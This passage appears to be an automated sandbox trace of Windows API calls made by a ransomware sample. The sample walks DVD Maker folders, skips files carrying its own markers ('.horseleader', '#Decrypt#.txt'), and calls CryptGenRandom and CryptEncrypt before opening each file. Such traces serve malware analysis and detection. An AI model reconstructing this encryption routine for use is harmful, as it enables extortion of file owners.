dwReserved0=0xfb834915, 
dwReserved1=0xd3dda4fd, cFileName="rectangle_specialocc_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0251.770] lstrcmpiW (lpString1="rectangle_specialocc_Thumbnail.bmp", lpString2="Windows") returned -1 [0251.770] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_specialocc_Thumbnail.bmp") returned 82 [0251.770] StrStrIW (lpFirst="rectangle_specialocc_Thumbnail.bmp", lpSrch=".horseleader") returned 0x0 [0251.770] lstrcmpW (lpString1="rectangle_specialocc_Thumbnail.bmp", lpString2="#Decrypt#.txt") returned 1 [0251.770] lstrcmpW (lpString1="rectangle_specialocc_Thumbnail.bmp", lpString2="_uninstalling_.png") returned 1 [0251.770] lstrlenW (lpString=".testttjffg") returned 11 [0251.770] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_specialocc_Thumbnail.bmp", lpSrch=".testttjffg") returned 0x0 [0251.770] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.770] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.770] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_specialocc_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_specialocc_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.771] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eb7fe80, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6eb7fe80, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4eebf0eb, 
ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="rectangle_travel_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0251.771] lstrcmpiW (lpString1="rectangle_travel_Thumbnail.bmp", lpString2="Windows") returned -1 [0251.771] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_travel_Thumbnail.bmp") returned 78 [0251.771] StrStrIW (lpFirst="rectangle_travel_Thumbnail.bmp", lpSrch=".horseleader") returned 0x0 [0251.771] lstrcmpW (lpString1="rectangle_travel_Thumbnail.bmp", lpString2="#Decrypt#.txt") returned 1 [0251.771] lstrcmpW (lpString1="rectangle_travel_Thumbnail.bmp", lpString2="_uninstalling_.png") returned 1 [0251.771] lstrlenW (lpString=".testttjffg") returned 11 [0251.771] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_travel_Thumbnail.bmp", lpSrch=".testttjffg") returned 0x0 [0251.771] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.771] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.771] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_travel_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_travel_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.772] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eb7fe80, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6eb7fe80, 
ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4eebf0eb, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="rectangle_widescreen_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0251.772] lstrcmpiW (lpString1="rectangle_widescreen_Thumbnail.bmp", lpString2="Windows") returned -1 [0251.772] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_widescreen_Thumbnail.bmp") returned 82 [0251.772] StrStrIW (lpFirst="rectangle_widescreen_Thumbnail.bmp", lpSrch=".horseleader") returned 0x0 [0251.772] lstrcmpW (lpString1="rectangle_widescreen_Thumbnail.bmp", lpString2="#Decrypt#.txt") returned 1 [0251.772] lstrcmpW (lpString1="rectangle_widescreen_Thumbnail.bmp", lpString2="_uninstalling_.png") returned 1 [0251.772] lstrlenW (lpString=".testttjffg") returned 11 [0251.772] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_widescreen_Thumbnail.bmp", lpSrch=".testttjffg") returned 0x0 [0251.772] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.772] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.772] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_widescreen_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_widescreen_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.773] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, 
ftCreationTime.dwLowDateTime=0xa119af33, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa86cdff, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa12338ef, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ResizingPanels", cAlternateFileName="RESIZI~1")) returned 1 [0251.773] lstrcmpiW (lpString1="ResizingPanels", lpString2="Windows") returned -1 [0251.773] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels") returned 62 [0251.773] lstrcmpW (lpString1="ResizingPanels", lpString2=".") returned 1 [0251.773] lstrcmpW (lpString1="ResizingPanels", lpString2="..") returned 1 [0251.773] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.773] GetProcessHeap () returned 0x780000 [0251.773] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0251.773] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\*") returned 64 [0251.773] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa119af33, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa86cdff, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa12338ef, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0251.776] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.776] wnsprintfW (in: 
pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\.") returned 64 [0251.776] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.776] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa119af33, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa86cdff, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa12338ef, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="..", cAlternateFileName="")) returned 1 [0251.777] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.777] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\..") returned 65 [0251.777] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.777] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.777] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7091adcb, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7091adcb, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4efa391f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 [0251.777] lstrcmpiW (lpString1="1047x576black.png", lpString2="Windows") returned -1 [0251.777] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\1047x576black.png") returned 80 [0251.777] StrStrIW (lpFirst="1047x576black.png", lpSrch=".horseleader") 
returned 0x0 [0251.777] lstrcmpW (lpString1="1047x576black.png", lpString2="#Decrypt#.txt") returned 1 [0251.777] lstrcmpW (lpString1="1047x576black.png", lpString2="_uninstalling_.png") returned 1 [0251.777] lstrlenW (lpString=".testttjffg") returned 11 [0251.777] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\1047x576black.png", lpSrch=".testttjffg") returned 0x0 [0251.777] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.777] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.778] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\1047x576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.778] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70a4b8b3, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70a4b8b3, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4efa391f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb04, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="203x8subpicture.png", cAlternateFileName="")) returned 1 [0251.778] lstrcmpiW (lpString1="203x8subpicture.png", lpString2="Windows") returned -1 [0251.778] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\203x8subpicture.png") returned 82 [0251.778] StrStrIW (lpFirst="203x8subpicture.png", 
lpSrch=".horseleader") returned 0x0 [0251.778] lstrcmpW (lpString1="203x8subpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.778] lstrcmpW (lpString1="203x8subpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.778] lstrlenW (lpString=".testttjffg") returned 11 [0251.778] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\203x8subpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.778] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.778] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.778] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\203x8subpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\203x8subpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.779] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7079e029, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7079e029, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4efa391f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x5aaf, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="bandwidth.png", cAlternateFileName="")) returned 1 [0251.779] lstrcmpiW (lpString1="bandwidth.png", lpString2="Windows") returned -1 [0251.779] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\bandwidth.png") returned 76 [0251.779] StrStrIW 
(lpFirst="bandwidth.png", lpSrch=".horseleader") returned 0x0 [0251.779] lstrcmpW (lpString1="bandwidth.png", lpString2="#Decrypt#.txt") returned 1 [0251.779] lstrcmpW (lpString1="bandwidth.png", lpString2="_uninstalling_.png") returned 1 [0251.779] lstrlenW (lpString=".testttjffg") returned 11 [0251.779] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\bandwidth.png", lpSrch=".testttjffg") returned 0x0 [0251.779] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.779] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.779] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\bandwidth.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\bandwidth.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.784] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70a25756, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70a25756, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4efa391f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x191f, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="blackbars80.png", cAlternateFileName="")) returned 1 [0251.784] lstrcmpiW (lpString1="blackbars80.png", lpString2="Windows") returned -1 [0251.784] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\blackbars80.png") returned 78 [0251.784] StrStrIW 
(lpFirst="blackbars80.png", lpSrch=".horseleader") returned 0x0 [0251.784] lstrcmpW (lpString1="blackbars80.png", lpString2="#Decrypt#.txt") returned 1 [0251.784] lstrcmpW (lpString1="blackbars80.png", lpString2="_uninstalling_.png") returned 1 [0251.784] lstrlenW (lpString=".testttjffg") returned 11 [0251.784] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\blackbars80.png", lpSrch=".testttjffg") returned 0x0 [0251.784] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.784] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.784] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\blackbars80.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\blackbars80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.784] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x708ceb11, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x708ceb11, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4efa391f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13e0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationLeft_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.784] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.784] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD 
Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationLeft_ButtonGraphic.png") returned 95 [0251.784] StrStrIW (lpFirst="NavigationLeft_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.784] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.785] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.785] lstrlenW (lpString=".testttjffg") returned 11 [0251.785] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationLeft_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.785] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.785] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.785] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.785] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70810440, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70810440, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4efa391f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc3a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationLeft_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.785] lstrcmpiW 
(lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.785] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationLeft_SelectionSubpicture.png") returned 101 [0251.785] StrStrIW (lpFirst="NavigationLeft_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.785] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.785] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.785] lstrlenW (lpString=".testttjffg") returned 11 [0251.785] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationLeft_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.785] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.785] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.785] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.786] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7083659d, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7083659d, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4efa391f, 
ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13a1, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationRight_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.786] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.786] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationRight_ButtonGraphic.png") returned 96 [0251.786] StrStrIW (lpFirst="NavigationRight_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.786] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.786] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.786] lstrlenW (lpString=".testttjffg") returned 11 [0251.786] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationRight_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.786] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.786] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.786] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.786] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x707c4186, 
ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x707c4186, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4efa391f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2e, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationRight_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.786] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.786] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationRight_SelectionSubpicture.png") returned 102 [0251.786] StrStrIW (lpFirst="NavigationRight_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.787] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.787] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.787] lstrlenW (lpString=".testttjffg") returned 11 [0251.787] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationRight_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.787] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.787] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, 